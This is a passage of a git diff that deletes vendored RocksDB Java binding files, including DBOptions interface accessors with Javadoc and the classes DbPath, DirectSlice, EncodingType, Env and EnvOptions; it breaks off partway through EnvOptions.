-  AccessHint accessHintOnCompactionStart();
-
-  /**
-   * If true, always create a new file descriptor and new table reader
-   * for compaction inputs. Turn this parameter on may introduce extra
-   * memory usage in the table reader, if it allocates extra memory
-   * for indexes. This will allow file descriptor prefetch options
-   * to be set for compaction input files and not to impact file
-   * descriptors for the same file used by user queries.
-   * Suggest to enable {@link BlockBasedTableConfig#cacheIndexAndFilterBlocks()}
-   * for this mode if using block-based table.
-   *
-   * Default: false
-   *
-   * @param newTableReaderForCompactionInputs true if a new file descriptor and
-   *     table reader should be created for compaction inputs
-   *
-   * @return the reference to the current options.
-   */
-  T setNewTableReaderForCompactionInputs(
-      boolean newTableReaderForCompactionInputs);
-
-  /**
-   * If true, always create a new file descriptor and new table reader
-   * for compaction inputs. Turn this parameter on may introduce extra
-   * memory usage in the table reader, if it allocates extra memory
-   * for indexes. This will allow file descriptor prefetch options
-   * to be set for compaction input files and not to impact file
-   * descriptors for the same file used by user queries.
-   * Suggest to enable {@link BlockBasedTableConfig#cacheIndexAndFilterBlocks()}
-   * for this mode if using block-based table.
-   *
-   * Default: false
-   *
-   * @return true if a new file descriptor and table reader are created for
-   *     compaction inputs
-   */
-  boolean newTableReaderForCompactionInputs();
-
-  /**
-   * If non-zero, we perform bigger reads when doing compaction. If you're
-   * running RocksDB on spinning disks, you should set this to at least 2MB.
-   *
-   * That way RocksDB's compaction is doing sequential instead of random reads.
-   * When non-zero, we also force {@link #newTableReaderForCompactionInputs()}
-   * to true.
-   *
-   * Default: 0
-   *
-   * @param compactionReadaheadSize The compaction read-ahead size
-   *
-   * @return the reference to the current options.
-   */
-  T setCompactionReadaheadSize(final long compactionReadaheadSize);
-
-  /**
-   * If non-zero, we perform bigger reads when doing compaction. If you're
-   * running RocksDB on spinning disks, you should set this to at least 2MB.
-   *
-   * That way RocksDB's compaction is doing sequential instead of random reads.
-   * When non-zero, we also force {@link #newTableReaderForCompactionInputs()}
-   * to true.
-   *
-   * Default: 0
-   *
-   * @return The compaction read-ahead size
-   */
-  long compactionReadaheadSize();
-
-  /**
-   * This is a maximum buffer size that is used by WinMmapReadableFile in
-   * unbuffered disk I/O mode. We need to maintain an aligned buffer for
-   * reads. We allow the buffer to grow until the specified value and then
-   * for bigger requests allocate one shot buffers. In unbuffered mode we
-   * always bypass read-ahead buffer at ReadaheadRandomAccessFile
-   * When read-ahead is required we then make use of
-   * {@link #compactionReadaheadSize()} value and always try to read ahead.
-   * With read-ahead we always pre-allocate buffer to the size instead of
-   * growing it up to a limit.
-   *
-   * This option is currently honored only on Windows
-   *
-   * Default: 1 Mb
-   *
-   * Special value: 0 - means do not maintain per instance buffer. Allocate
-   *                per request buffer and avoid locking.
-   *
-   * @param randomAccessMaxBufferSize the maximum size of the random access
-   *     buffer
-   *
-   * @return the reference to the current options.
-   */
-  T setRandomAccessMaxBufferSize(long randomAccessMaxBufferSize);
-
-  /**
-   * This is a maximum buffer size that is used by WinMmapReadableFile in
-   * unbuffered disk I/O mode. We need to maintain an aligned buffer for
-   * reads. We allow the buffer to grow until the specified value and then
-   * for bigger requests allocate one shot buffers. In unbuffered mode we
-   * always bypass read-ahead buffer at ReadaheadRandomAccessFile
-   * When read-ahead is required we then make use of
-   * {@link #compactionReadaheadSize()} value and always try to read ahead.
-   * With read-ahead we always pre-allocate buffer to the size instead of
-   * growing it up to a limit.
-   *
-   * This option is currently honored only on Windows
-   *
-   * Default: 1 Mb
-   *
-   * Special value: 0 - means do not maintain per instance buffer. Allocate
-   *                per request buffer and avoid locking.
-   *
-   * @return the maximum size of the random access buffer
-   */
-  long randomAccessMaxBufferSize();
-
-  /**
-   * This is the maximum buffer size that is used by WritableFileWriter.
-   * On Windows, we need to maintain an aligned buffer for writes.
-   * We allow the buffer to grow until it's size hits the limit.
-   *
-   * Default: 1024 * 1024 (1 MB)
-   *
-   * @param writableFileMaxBufferSize the maximum buffer size
-   *
-   * @return the reference to the current options.
-   */
-  T setWritableFileMaxBufferSize(long writableFileMaxBufferSize);
-
-  /**
-   * This is the maximum buffer size that is used by WritableFileWriter.
-   * On Windows, we need to maintain an aligned buffer for writes.
-   * We allow the buffer to grow until it's size hits the limit.
-   *
-   * Default: 1024 * 1024 (1 MB)
-   *
-   * @return the maximum buffer size
-   */
-  long writableFileMaxBufferSize();
-
-  /**
-   * Use adaptive mutex, which spins in the user space before resorting
-   * to kernel. This could reduce context switch when the mutex is not
-   * heavily contended. However, if the mutex is hot, we could end up
-   * wasting spin time.
-   * Default: false
-   *
-   * @param useAdaptiveMutex true if adaptive mutex is used.
-   * @return the instance of the current object.
-   */
-  T setUseAdaptiveMutex(boolean useAdaptiveMutex);
-
-  /**
-   * Use adaptive mutex, which spins in the user space before resorting
-   * to kernel. This could reduce context switch when the mutex is not
-   * heavily contended. However, if the mutex is hot, we could end up
-   * wasting spin time.
-   * Default: false
-   *
-   * @return true if adaptive mutex is used.
-   */
-  boolean useAdaptiveMutex();
-
-  /**
-   * Allows OS to incrementally sync files to disk while they are being
-   * written, asynchronously, in the background.
-   * Issue one request for every bytes_per_sync written. 0 turns it off.
-   * Default: 0
-   *
-   * @param bytesPerSync size in bytes
-   * @return the instance of the current object.
-   */
-  T setBytesPerSync(long bytesPerSync);
-
-  /**
-   * Allows OS to incrementally sync files to disk while they are being
-   * written, asynchronously, in the background.
-   * Issue one request for every bytes_per_sync written. 0 turns it off.
-   * Default: 0
-   *
-   * @return size in bytes
-   */
-  long bytesPerSync();
-
-  /**
-   * Same as {@link #setBytesPerSync(long)} , but applies to WAL files
-   *
-   * Default: 0, turned off
-   *
-   * @param walBytesPerSync size in bytes
-   * @return the instance of the current object.
-   */
-  T setWalBytesPerSync(long walBytesPerSync);
-
-  /**
-   * Same as {@link #bytesPerSync()} , but applies to WAL files
-   *
-   * Default: 0, turned off
-   *
-   * @return size in bytes
-   */
-  long walBytesPerSync();
-
-  /**
-   * If true, then the status of the threads involved in this DB will
-   * be tracked and available via GetThreadList() API.
-   *
-   * Default: false
-   *
-   * @param enableThreadTracking true to enable tracking
-   *
-   * @return the reference to the current options.
-   */
-  T setEnableThreadTracking(boolean enableThreadTracking);
-
-  /**
-   * If true, then the status of the threads involved in this DB will
-   * be tracked and available via GetThreadList() API.
-   *
-   * Default: false
-   *
-   * @return true if tracking is enabled
-   */
-  boolean enableThreadTracking();
-
-  /**
-   * The limited write rate to DB if
-   * {@link ColumnFamilyOptions#softPendingCompactionBytesLimit()} or
-   * {@link ColumnFamilyOptions#level0SlowdownWritesTrigger()} is triggered,
-   * or we are writing to the last mem table allowed and we allow more than 3
-   * mem tables. It is calculated using size of user write requests before
-   * compression. RocksDB may decide to slow down more if the compaction still
-   * gets behind further.
-   *
-   * Unit: bytes per second.
-   *
-   * Default: 16MB/s
-   *
-   * @param delayedWriteRate the rate in bytes per second
-   *
-   * @return the reference to the current options.
-   */
-  T setDelayedWriteRate(long delayedWriteRate);
-
-  /**
-   * The limited write rate to DB if
-   * {@link ColumnFamilyOptions#softPendingCompactionBytesLimit()} or
-   * {@link ColumnFamilyOptions#level0SlowdownWritesTrigger()} is triggered,
-   * or we are writing to the last mem table allowed and we allow more than 3
-   * mem tables. It is calculated using size of user write requests before
-   * compression. RocksDB may decide to slow down more if the compaction still
-   * gets behind further.
-   *
-   * Unit: bytes per second.
-   *
-   * Default: 16MB/s
-   *
-   * @return the rate in bytes per second
-   */
-  long delayedWriteRate();
-
-  /**
-   * If true, allow multi-writers to update mem tables in parallel.
-   * Only some memtable factorys support concurrent writes; currently it
-   * is implemented only for SkipListFactory.  Concurrent memtable writes
-   * are not compatible with inplace_update_support or filter_deletes.
-   * It is strongly recommended to set
-   * {@link #setEnableWriteThreadAdaptiveYield(boolean)} if you are going to use
-   * this feature.
-   * Default: false
-   *
-   * @param allowConcurrentMemtableWrite true to enable concurrent writes
-   *     for the memtable
-   *
-   * @return the reference to the current options.
-   */
-  T setAllowConcurrentMemtableWrite(boolean allowConcurrentMemtableWrite);
-
-  /**
-   * If true, allow multi-writers to update mem tables in parallel.
-   * Only some memtable factorys support concurrent writes; currently it
-   * is implemented only for SkipListFactory.  Concurrent memtable writes
-   * are not compatible with inplace_update_support or filter_deletes.
-   * It is strongly recommended to set
-   * {@link #setEnableWriteThreadAdaptiveYield(boolean)} if you are going to use
-   * this feature.
-   * Default: false
-   *
-   * @return true if concurrent writes are enabled for the memtable
-   */
-  boolean allowConcurrentMemtableWrite();
-
-  /**
-   * If true, threads synchronizing with the write batch group leader will
-   * wait for up to {@link #writeThreadMaxYieldUsec()} before blocking on a
-   * mutex. This can substantially improve throughput for concurrent workloads,
-   * regardless of whether {@link #allowConcurrentMemtableWrite()} is enabled.
-   * Default: false
-   *
-   * @param enableWriteThreadAdaptiveYield true to enable adaptive yield for the
-   *     write threads
-   *
-   * @return the reference to the current options.
-   */
-  T setEnableWriteThreadAdaptiveYield(
-      boolean enableWriteThreadAdaptiveYield);
-
-  /**
-   * If true, threads synchronizing with the write batch group leader will
-   * wait for up to {@link #writeThreadMaxYieldUsec()} before blocking on a
-   * mutex. This can substantially improve throughput for concurrent workloads,
-   * regardless of whether {@link #allowConcurrentMemtableWrite()} is enabled.
-   * Default: false
-   *
-   * @return true if adaptive yield is enabled
-   *    for the writing threads
-   */
-  boolean enableWriteThreadAdaptiveYield();
-
-  /**
-   * The maximum number of microseconds that a write operation will use
-   * a yielding spin loop to coordinate with other write threads before
-   * blocking on a mutex.  (Assuming {@link #writeThreadSlowYieldUsec()} is
-   * set properly) increasing this value is likely to increase RocksDB
-   * throughput at the expense of increased CPU usage.
-   * Default: 100
-   *
-   * @param writeThreadMaxYieldUsec maximum number of microseconds
-   *
-   * @return the reference to the current options.
-   */
-  T setWriteThreadMaxYieldUsec(long writeThreadMaxYieldUsec);
-
-  /**
-   * The maximum number of microseconds that a write operation will use
-   * a yielding spin loop to coordinate with other write threads before
-   * blocking on a mutex.  (Assuming {@link #writeThreadSlowYieldUsec()} is
-   * set properly) increasing this value is likely to increase RocksDB
-   * throughput at the expense of increased CPU usage.
-   * Default: 100
-   *
-   * @return the maximum number of microseconds
-   */
-  long writeThreadMaxYieldUsec();
-
-  /**
-   * The latency in microseconds after which a std::this_thread::yield
-   * call (sched_yield on Linux) is considered to be a signal that
-   * other processes or threads would like to use the current core.
-   * Increasing this makes writer threads more likely to take CPU
-   * by spinning, which will show up as an increase in the number of
-   * involuntary context switches.
-   * Default: 3
-   *
-   * @param writeThreadSlowYieldUsec the latency in microseconds
-   *
-   * @return the reference to the current options.
-   */
-  T setWriteThreadSlowYieldUsec(long writeThreadSlowYieldUsec);
-
-  /**
-   * The latency in microseconds after which a std::this_thread::yield
-   * call (sched_yield on Linux) is considered to be a signal that
-   * other processes or threads would like to use the current core.
-   * Increasing this makes writer threads more likely to take CPU
-   * by spinning, which will show up as an increase in the number of
-   * involuntary context switches.
-   * Default: 3
-   *
-   * @return writeThreadSlowYieldUsec the latency in microseconds
-   */
-  long writeThreadSlowYieldUsec();
-
-  /**
-   * If true, then DB::Open() will not update the statistics used to optimize
-   * compaction decision by loading table properties from many files.
-   * Turning off this feature will improve DBOpen time especially in
-   * disk environment.
-   *
-   * Default: false
-   *
-   * @param skipStatsUpdateOnDbOpen true if updating stats will be skipped
-   *
-   * @return the reference to the current options.
-   */
-  T setSkipStatsUpdateOnDbOpen(boolean skipStatsUpdateOnDbOpen);
-
-  /**
-   * If true, then DB::Open() will not update the statistics used to optimize
-   * compaction decision by loading table properties from many files.
-   * Turning off this feature will improve DBOpen time especially in
-   * disk environment.
-   *
-   * Default: false
-   *
-   * @return true if updating stats will be skipped
-   */
-  boolean skipStatsUpdateOnDbOpen();
-
-  /**
-   * Recovery mode to control the consistency while replaying WAL
-   *
-   * Default: {@link WALRecoveryMode#PointInTimeRecovery}
-   *
-   * @param walRecoveryMode The WAL recover mode
-   *
-   * @return the reference to the current options.
-   */
-  T setWalRecoveryMode(WALRecoveryMode walRecoveryMode);
-
-  /**
-   * Recovery mode to control the consistency while replaying WAL
-   *
-   * Default: {@link WALRecoveryMode#PointInTimeRecovery}
-   *
-   * @return The WAL recover mode
-   */
-  WALRecoveryMode walRecoveryMode();
-
-  /**
-   * if set to false then recovery will fail when a prepared
-   * transaction is encountered in the WAL
-   *
-   * Default: false
-   *
-   * @param allow2pc true if two-phase-commit is enabled
-   *
-   * @return the reference to the current options.
-   */
-  T setAllow2pc(boolean allow2pc);
-
-  /**
-   * if set to false then recovery will fail when a prepared
-   * transaction is encountered in the WAL
-   *
-   * Default: false
-   *
-   * @return true if two-phase-commit is enabled
-   */
-  boolean allow2pc();
-
-  /**
-   * A global cache for table-level rows.
-   *
-   * Default: null (disabled)
-   *
-   * @param rowCache The global row cache
-   *
-   * @return the reference to the current options.
-   */
-  T setRowCache(final Cache rowCache);
-
-  /**
-   * A global cache for table-level rows.
-   *
-   * Default: null (disabled)
-   *
-   * @return The global row cache
-   */
-  Cache rowCache();
-
-  /**
-   * If true, then DB::Open / CreateColumnFamily / DropColumnFamily
-   * / SetOptions will fail if options file is not detected or properly
-   * persisted.
-   *
-   * DEFAULT: false
-   *
-   * @param failIfOptionsFileError true if we should fail if there is an error
-   *     in the options file
-   *
-   * @return the reference to the current options.
-   */
-  T setFailIfOptionsFileError(boolean failIfOptionsFileError);
-
-  /**
-   * If true, then DB::Open / CreateColumnFamily / DropColumnFamily
-   * / SetOptions will fail if options file is not detected or properly
-   * persisted.
-   *
-   * DEFAULT: false
-   *
-   * @return true if we should fail if there is an error in the options file
-   */
-  boolean failIfOptionsFileError();
-
-  /**
-   * If true, then print malloc stats together with rocksdb.stats
-   * when printing to LOG.
-   *
-   * DEFAULT: false
-   *
-   * @param dumpMallocStats true if malloc stats should be printed to LOG
-   *
-   * @return the reference to the current options.
-   */
-  T setDumpMallocStats(boolean dumpMallocStats);
-
-  /**
-   * If true, then print malloc stats together with rocksdb.stats
-   * when printing to LOG.
-   *
-   * DEFAULT: false
-   *
-   * @return true if malloc stats should be printed to LOG
-   */
-  boolean dumpMallocStats();
-
-  /**
-   * By default RocksDB replay WAL logs and flush them on DB open, which may
-   * create very small SST files. If this option is enabled, RocksDB will try
-   * to avoid (but not guarantee not to) flush during recovery. Also, existing
-   * WAL logs will be kept, so that if crash happened before flush, we still
-   * have logs to recover from.
-   *
-   * DEFAULT: false
-   *
-   * @param avoidFlushDuringRecovery true to try to avoid (but not guarantee
-   *     not to) flush during recovery
-   *
-   * @return the reference to the current options.
-   */
-  T setAvoidFlushDuringRecovery(boolean avoidFlushDuringRecovery);
-
-  /**
-   * By default RocksDB replay WAL logs and flush them on DB open, which may
-   * create very small SST files. If this option is enabled, RocksDB will try
-   * to avoid (but not guarantee not to) flush during recovery. Also, existing
-   * WAL logs will be kept, so that if crash happened before flush, we still
-   * have logs to recover from.
-   *
-   * DEFAULT: false
-   *
-   * @return true to try to avoid (but not guarantee not to) flush during
-   *     recovery
-   */
-  boolean avoidFlushDuringRecovery();
-
-  /**
-   * By default RocksDB will flush all memtables on DB close if there are
-   * unpersisted data (i.e. with WAL disabled) The flush can be skip to speedup
-   * DB close. Unpersisted data WILL BE LOST.
-   *
-   * DEFAULT: false
-   *
-   * Dynamically changeable through
-   *     {@link RocksDB#setOptions(ColumnFamilyHandle, MutableColumnFamilyOptions)}
-   *     API.
-   *
-   * @param avoidFlushDuringShutdown true if we should avoid flush during
-   *     shutdown
-   *
-   * @return the reference to the current options.
-   */
-  T setAvoidFlushDuringShutdown(boolean avoidFlushDuringShutdown);
-
-  /**
-   * By default RocksDB will flush all memtables on DB close if there are
-   * unpersisted data (i.e. with WAL disabled) The flush can be skip to speedup
-   * DB close. Unpersisted data WILL BE LOST.
-   *
-   * DEFAULT: false
-   *
-   * Dynamically changeable through
-   *     {@link RocksDB#setOptions(ColumnFamilyHandle, MutableColumnFamilyOptions)}
-   *     API.
-   *
-   * @return true if we should avoid flush during shutdown
-   */
-  boolean avoidFlushDuringShutdown();
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DbPath.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DbPath.java
deleted file mode 100644
index 3f0b675..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DbPath.java
+++ /dev/null
@@ -1,47 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.nio.file.Path;
-
-/**
- * Tuple of database path and target size
- */
-public class DbPath {
-  final Path path;
-  final long targetSize;
-
-  public DbPath(final Path path, final long targetSize) {
-    this.path = path;
-    this.targetSize = targetSize;
-  }
-
-  @Override
-  public boolean equals(final Object o) {
-    if (this == o) {
-      return true;
-    }
-
-    if (o == null || getClass() != o.getClass()) {
-      return false;
-    }
-
-    final DbPath dbPath = (DbPath) o;
-
-    if (targetSize != dbPath.targetSize) {
-      return false;
-    }
-
-    return path != null ? path.equals(dbPath.path) : dbPath.path == null;
-  }
-
-  @Override
-  public int hashCode() {
-    int result = path != null ? path.hashCode() : 0;
-    result = 31 * result + (int) (targetSize ^ (targetSize >>> 32));
-    return result;
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DirectComparator.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DirectComparator.java
deleted file mode 100644
index 4c37dfd..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DirectComparator.java
+++ /dev/null
@@ -1,33 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Base class for comparators which will receive
- * ByteBuffer based access via org.rocksdb.DirectSlice
- * in their compare method implementation.
- *
- * ByteBuffer based slices perform better when large keys
- * are involved. When using smaller keys consider
- * using @see org.rocksdb.Comparator
- */
-public abstract class DirectComparator extends AbstractComparator<DirectSlice> {
-
-  private final long nativeHandle_;
-
-  public DirectComparator(final ComparatorOptions copt) {
-    super();
-    this.nativeHandle_ = createNewDirectComparator0(copt.nativeHandle_);
-  }
-
-  @Override
-  protected final long getNativeHandle() {
-    return nativeHandle_;
-  }
-
-  private native long createNewDirectComparator0(
-      final long comparatorOptionsHandle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DirectSlice.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DirectSlice.java
deleted file mode 100644
index b0d35c3..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/DirectSlice.java
+++ /dev/null
@@ -1,132 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.nio.ByteBuffer;
-
-/**
- * Base class for slices which will receive direct
- * ByteBuffer based access to the underlying data.
- *
- * ByteBuffer backed slices typically perform better with
- * larger keys and values. When using smaller keys and
- * values consider using @see org.rocksdb.Slice
- */
-public class DirectSlice extends AbstractSlice<ByteBuffer> {
-  public final static DirectSlice NONE = new DirectSlice();
-
-  /**
-   * Indicates whether we have to free the memory pointed to by the Slice
-   */
-  private final boolean internalBuffer;
-  private volatile boolean cleared = false;
-  private volatile long internalBufferOffset = 0;
-
-  /**
-   * Called from JNI to construct a new Java DirectSlice
-   * without an underlying C++ object set
-   * at creation time.
-   *
-   * Note: You should be aware that it is intentionally marked as
-   * package-private. This is so that developers cannot construct their own
-   * default DirectSlice objects (at present). As developers cannot construct
-   * their own DirectSlice objects through this, they are not creating
-   * underlying C++ DirectSlice objects, and so there is nothing to free
-   * (dispose) from Java.
-   */
-  DirectSlice() {
-    super();
-    this.internalBuffer = false;
-  }
-
-  /**
-   * Constructs a slice
-   * where the data is taken from
-   * a String.
-   *
-   * @param str The string
-   */
-  public DirectSlice(final String str) {
-    super(createNewSliceFromString(str));
-    this.internalBuffer = true;
-  }
-
-  /**
-   * Constructs a slice where the data is
-   * read from the provided
-   * ByteBuffer up to a certain length
-   *
-   * @param data The buffer containing the data
-   * @param length The length of the data to use for the slice
-   */
-  public DirectSlice(final ByteBuffer data, final int length) {
-    super(createNewDirectSlice0(ensureDirect(data), length));
-    this.internalBuffer = false;
-  }
-
-  /**
-   * Constructs a slice where the data is
-   * read from the provided
-   * ByteBuffer
-   *
-   * @param data The bugger containing the data
-   */
-  public DirectSlice(final ByteBuffer data) {
-    super(createNewDirectSlice1(ensureDirect(data)));
-    this.internalBuffer = false;
-  }
-
-  private static ByteBuffer ensureDirect(final ByteBuffer data) {
-    if(!data.isDirect()) {
-      throw new IllegalArgumentException("The ByteBuffer must be direct");
-    }
-    return data;
-  }
-
-  /**
-   * Retrieves the byte at a specific offset
-   * from the underlying data
-   *
-   * @param offset The (zero-based) offset of the byte to retrieve
-   *
-   * @return the requested byte
-   */
-  public byte get(final int offset) {
-    return get0(getNativeHandle(), offset);
-  }
-
-  @Override
-  public void clear() {
-    clear0(getNativeHandle(), !cleared && internalBuffer, internalBufferOffset);
-    cleared = true;
-  }
-
-  @Override
-  public void removePrefix(final int n) {
-    removePrefix0(getNativeHandle(), n);
-    this.internalBufferOffset += n;
-  }
-
-  @Override
-  protected void disposeInternal() {
-    final long nativeHandle = getNativeHandle();
-    if(!cleared && internalBuffer) {
-      disposeInternalBuf(nativeHandle, internalBufferOffset);
-    }
-    disposeInternal(nativeHandle);
-  }
-
-  private native static long createNewDirectSlice0(final ByteBuffer data,
-      final int length);
-  private native static long createNewDirectSlice1(final ByteBuffer data);
-  @Override protected final native ByteBuffer data0(long handle);
-  private native byte get0(long handle, int offset);
-  private native void clear0(long handle, boolean internalBuffer,
-      long internalBufferOffset);
-  private native void removePrefix0(long handle, int length);
-  private native void disposeInternalBuf(final long handle,
-      long internalBufferOffset);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/EncodingType.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/EncodingType.java
deleted file mode 100644
index 5ceeb54..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/EncodingType.java
+++ /dev/null
@@ -1,55 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * EncodingType
- *
- * <p>The value will determine how to encode keys
- * when writing to a new SST file.</p>
- *
- * <p>This value will be stored
- * inside the SST file which will be used when reading from
- * the file, which makes it possible for users to choose
- * different encoding type when reopening a DB. Files with
- * different encoding types can co-exist in the same DB and
- * can be read.</p>
- */
-public enum EncodingType {
-  /**
-   * Always write full keys without any special encoding.
-   */
-  kPlain((byte) 0),
-  /**
-   * <p>Find opportunity to write the same prefix once for multiple rows.
-   * In some cases, when a key follows a previous key with the same prefix,
-   * instead of writing out the full key, it just writes out the size of the
-   * shared prefix, as well as other bytes, to save some bytes.</p>
-   *
-   * <p>When using this option, the user is required to use the same prefix
-   * extractor to make sure the same prefix will be extracted from the same key.
-   * The Name() value of the prefix extractor will be stored in the file. When
-   * reopening the file, the name of the options.prefix_extractor given will be
-   * bitwise compared to the prefix extractors stored in the file. An error
-   * will be returned if the two don't match.</p>
-   */
-  kPrefix((byte) 1);
-
-  /**
-   * Returns the byte value of the enumerations value
-   *
-   * @return byte representation
-   */
-  public byte getValue() {
-    return value_;
-  }
-
-  private EncodingType(byte value) {
-    value_ = value;
-  }
-
-  private final byte value_;
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Env.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Env.java
deleted file mode 100644
index a46f061..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Env.java
+++ /dev/null
@@ -1,92 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Base class for all Env implementations in RocksDB.
- */
-public abstract class Env extends RocksObject {
-  public static final int FLUSH_POOL = 0;
-  public static final int COMPACTION_POOL = 1;
-
-  /**
-   * <p>Returns the default environment suitable for the current operating
-   * system.</p>
-   *
-   * <p>The result of {@code getDefault()} is a singleton whose ownership
-   * belongs to rocksdb c++.  As a result, the returned RocksEnv will not
-   * have the ownership of its c++ resource, and calling its dispose()
-   * will be no-op.</p>
-   *
-   * @return the default {@link org.rocksdb.RocksEnv} instance.
-   */
-  public static Env getDefault() {
-    return default_env_;
-  }
-
-  /**
-   * <p>Sets the number of background worker threads of the flush pool
-   * for this environment.</p>
-   * <p>Default number: 1</p>
-   *
-   * @param num the number of threads
-   *
-   * @return current {@link RocksEnv} instance.
-   */
-  public Env setBackgroundThreads(final int num) {
-    return setBackgroundThreads(num, FLUSH_POOL);
-  }
-
-  /**
-   * <p>Sets the number of background worker threads of the specified thread
-   * pool for this environment.</p>
-   *
-   * @param num the number of threads
-   * @param poolID the id to specified a thread pool.  Should be either
-   *     FLUSH_POOL or COMPACTION_POOL.
-   *
-   * <p>Default number: 1</p>
-   * @return current {@link RocksEnv} instance.
-   */
-  public Env setBackgroundThreads(final int num, final int poolID) {
-    setBackgroundThreads(nativeHandle_, num, poolID);
-    return this;
-  }
-
-  /**
-   * <p>Returns the length of the queue associated with the specified
-   * thread pool.</p>
-   *
-   * @param poolID the id to specified a thread pool.  Should be either
-   *     FLUSH_POOL or COMPACTION_POOL.
-   *
-   * @return the thread pool queue length.
-   */
-  public int getThreadPoolQueueLen(final int poolID) {
-    return getThreadPoolQueueLen(nativeHandle_, poolID);
-  }
-
-
-  protected Env(final long nativeHandle) {
-    super(nativeHandle);
-  }
-
-  static {
-    default_env_ = new RocksEnv(getDefaultEnvInternal());
-  }
-
-  /**
-   * <p>The static default Env. The ownership of its native handle
-   * belongs to rocksdb c++ and is not able to be released on the Java
-   * side.</p>
-   */
-  static Env default_env_;
-
-  private static native long getDefaultEnvInternal();
-  private native void setBackgroundThreads(
-      long handle, int num, int priority);
-  private native int getThreadPoolQueueLen(long handle, int poolID);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/EnvOptions.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/EnvOptions.java
deleted file mode 100644
index 2bca035..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/EnvOptions.java
+++ /dev/null
@@ -1,207 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-public class EnvOptions extends RocksObject {
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  public EnvOptions() {
-    super(newEnvOptions());
-  }
-
-  public EnvOptions setUseOsBuffer(final boolean useOsBuffer) {
-    setUseOsBuffer(nativeHandle_, useOsBuffer);
-    return this;
-  }
-
-  public boolean useOsBuffer() {
-    assert(isOwningHandle());
-    return useOsBuffer(nativeHandle_);
-  }
-
-  public EnvOptions setUseMmapReads(final boolean useMmapReads) {
-    setUseMmapReads(nativeHandle_, useMmapReads);
-    return this;
-  }
-
-  public boolean useMmapReads() {
-    assert(isOwningHandle());
-    return useMmapReads(nativeHandle_);
-  }
-
-  public EnvOptions setUseMmapWrites(final boolean useMmapWrites) {
-    setUseMmapWrites(nativeHandle_, useMmapWrites);
-    return this;
-  }
-
-  public boolean useMmapWrites() {
-    assert(isOwningHandle());
-    return useMmapWrites(nativeHandle_);
-  }
-
-  public EnvOptions setUseDirectReads(final boolean useDirectReads) {
-    setUseDirectReads(nativeHandle_, useDirectReads);
-    return this;
-  }
-
-  public boolean useDirectReads() {
-    assert(isOwningHandle());
-    return useDirectReads(nativeHandle_);
-  }
-
-  public EnvOptions setUseDirectWrites(final boolean useDirectWrites) {
-    setUseDirectWrites(nativeHandle_, useDirectWrites);
-    return this;
-  }
-
-  public boolean useDirectWrites() {
-    assert(isOwningHandle());
-    return useDirectWrites(nativeHandle_);
-  }
-
-  public EnvOptions setAllowFallocate(final boolean allowFallocate) {
-    setAllowFallocate(nativeHandle_, allowFallocate);
-    return this;
-  }
-
-  public boolean allowFallocate() {
-    assert(isOwningHandle());
-    return allowFallocate(nativeHandle_);
-  }
-
-  public EnvOptions setSetFdCloexec(final boolean setFdCloexec) {
-    setSetFdCloexec(nativeHandle_, setFdCloexec);
-    return this;
-  }
-
-  public boolean setFdCloexec() {
-    assert(isOwningHandle());
-    return setFdCloexec(nativeHandle_);
-  }
-
-  public EnvOptions setBytesPerSync(final long bytesPerSync) {
-    setBytesPerSync(nativeHandle_, bytesPerSync);
-    return this;
-  }
-
-  public long bytesPerSync() {
-    assert(isOwningHandle());
-    return bytesPerSync(nativeHandle_);
-  }
-
-  public EnvOptions setFallocateWithKeepSize(final boolean fallocateWithKeepSize) {
-    setFallocateWithKeepSize(nativeHandle_, fallocateWithKeepSize);
-    return this;
-  }
-
-  public boolean fallocateWithKeepSize() {
-    assert(isOwningHandle());
-    return fallocateWithKeepSize(nativeHandle_);
-  }
-
-  public EnvOptions setCompactionReadaheadSize(final long compactionReadaheadSize) {
-    setCompactionReadaheadSize(nativeHandle_, compactionReadaheadSize);
-    return this;
-  }
-
